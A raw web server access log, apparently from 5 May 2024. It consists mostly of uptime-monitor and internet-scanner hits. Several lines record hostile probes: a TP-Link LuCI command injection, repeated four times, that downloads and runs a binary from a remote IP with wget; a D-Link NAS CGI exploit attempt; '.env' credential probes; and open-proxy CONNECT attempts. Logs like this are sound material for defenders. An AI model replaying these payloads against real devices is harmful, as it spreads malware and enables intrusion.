193.233.161.134 - - [05/May/2024:11:09:04 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/120.0"
179.43.188.106 - - [05/May/2024:11:09:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:11:09:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [05/May/2024:11:10:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:11:10:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:11:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.245.248.254 - - [05/May/2024:11:12:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
212.91.246.72 - - [05/May/2024:11:12:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.197.15.182 - - [05/May/2024:11:13:18 +0200] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 331 "-" "Mozilla/5.0 zgrab/0.x"
138.197.15.182 - - [05/May/2024:11:13:18 +0200] "GET /Pages/log/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
157.230.23.132 - - [05/May/2024:11:13:29 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
212.91.246.72 - - [05/May/2024:11:13:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:14:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:15:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:16:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:17:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.84.107.53 - - [05/May/2024:11:17:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/May/2024:11:18:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.230.127.68 - - [05/May/2024:11:19:18 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
143.255.242.241 - - [05/May/2024:11:19:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/May/2024:11:19:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:20:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:21:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:22:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:23:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [05/May/2024:11:24:21 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [05/May/2024:11:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
134.122.30.157 - - [05/May/2024:11:27:49 +0200] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 331 "-" "Mozilla/5.0 zgrab/0.x"
134.122.30.157 - - [05/May/2024:11:27:49 +0200] "GET /Pages/log/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [05/May/2024:11:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:30:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:31:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:32:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:33:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:34:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [05/May/2024:11:35:01 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [05/May/2024:11:35:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:36:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:37:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:38:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [05/May/2024:11:39:25 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:11:39:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:40:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.182.154.58 - - [05/May/2024:11:40:55 +0200] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 331 "-" "Mozilla/5.0 zgrab/0.x"
147.182.154.58 - - [05/May/2024:11:40:55 +0200] "GET /Pages/log/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [05/May/2024:11:41:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:42:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.109 - - [05/May/2024:11:43:19 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:11:43:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:44:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [05/May/2024:11:45:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:11:45:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:46:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.42 - - [05/May/2024:11:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:11:47:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.42 - - [05/May/2024:11:47:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.42 - - [05/May/2024:11:47:48 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.42 - - [05/May/2024:11:47:49 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.16.38.111 - - [05/May/2024:11:48:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:11:48:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:49:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:50:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.156.101 - - [05/May/2024:11:51:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.63 Chrome/124.0.6367.63 Not-A.Brand/99 Safari/537.36"
212.91.246.72 - - [05/May/2024:11:51:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.46 - - [05/May/2024:11:52:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
212.91.246.72 - - [05/May/2024:11:52:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:53:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.156.94 - - [05/May/2024:11:53:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
162.216.149.81 - - [05/May/2024:11:54:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
64.62.156.96 - - [05/May/2024:11:54:33 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0.0; Win64; x64; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.63 Chrome/124.0.6367.63 Not-A.Brand/99 Safari/537.36"
212.91.246.72 - - [05/May/2024:11:54:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.46 - - [05/May/2024:11:55:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15"
65.49.1.47 - - [05/May/2024:11:55:41 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
212.91.246.72 - - [05/May/2024:11:55:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:56:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [05/May/2024:11:57:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:11:57:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.254.38.45 - - [05/May/2024:11:58:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
212.91.246.72 - - [05/May/2024:11:58:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:59:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:00:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:01:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.38.111 - - [05/May/2024:12:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:12:02:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:03:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:04:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.69.52 - - [05/May/2024:12:05:32 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [05/May/2024:12:05:48 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:05:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:06:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:07:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:08:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:09:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.90 - - [05/May/2024:12:09:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [05/May/2024:12:10:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:11:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.128.27 - - [05/May/2024:12:13:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
212.91.246.72 - - [05/May/2024:12:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.69.52 - - [05/May/2024:12:14:20 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.58 - - [05/May/2024:12:15:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.58 - - [05/May/2024:12:15:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.58 - - [05/May/2024:12:15:26 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.58 - - [05/May/2024:12:15:28 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [05/May/2024:12:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.69.52 - - [05/May/2024:12:17:35 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.69.52 - - [05/May/2024:12:18:08 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
78.153.140.177 - - [05/May/2024:12:18:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.177 - - [05/May/2024:12:18:44 +0200] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
212.91.246.72 - - [05/May/2024:12:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.69.52 - - [05/May/2024:12:18:58 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
141.98.11.79 - - [05/May/2024:12:19:41 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:19:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.69.52 - - [05/May/2024:12:20:34 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:20:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:21:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.69.52 - - [05/May/2024:12:22:11 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:22:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.109 - - [05/May/2024:12:22:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:23:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:24:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.109 - - [05/May/2024:12:24:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
87.121.69.52 - - [05/May/2024:12:25:36 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:25:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [05/May/2024:12:26:43 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
212.91.246.72 - - [05/May/2024:12:26:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [05/May/2024:12:27:24 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
212.91.246.72 - - [05/May/2024:12:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [05/May/2024:12:27:55 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
195.1.144.109 - - [05/May/2024:12:28:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:28:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [05/May/2024:12:28:53 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
78.153.140.179 - - [05/May/2024:12:28:55 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.179 - - [05/May/2024:12:28:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [05/May/2024:12:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [05/May/2024:12:30:08 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [05/May/2024:12:30:09 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
212.91.246.72 - - [05/May/2024:12:30:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [05/May/2024:12:31:27 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [05/May/2024:12:31:32 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
172.105.77.209 - - [05/May/2024:12:31:47 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
199.45.154.79 - - [05/May/2024:12:31:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [05/May/2024:12:31:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.77.209 - - [05/May/2024:12:32:04 +0200] "\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf" 400 329 "-" "-"
212.91.246.72 - - [05/May/2024:12:32:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:33:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:34:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:35:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.147 - - [05/May/2024:12:36:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
212.91.246.72 - - [05/May/2024:12:36:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.69.52 - - [05/May/2024:12:37:05 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:12:37:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:12:38:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.233.161.134 - - [05/May/2024:12:39:27 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/120.0"
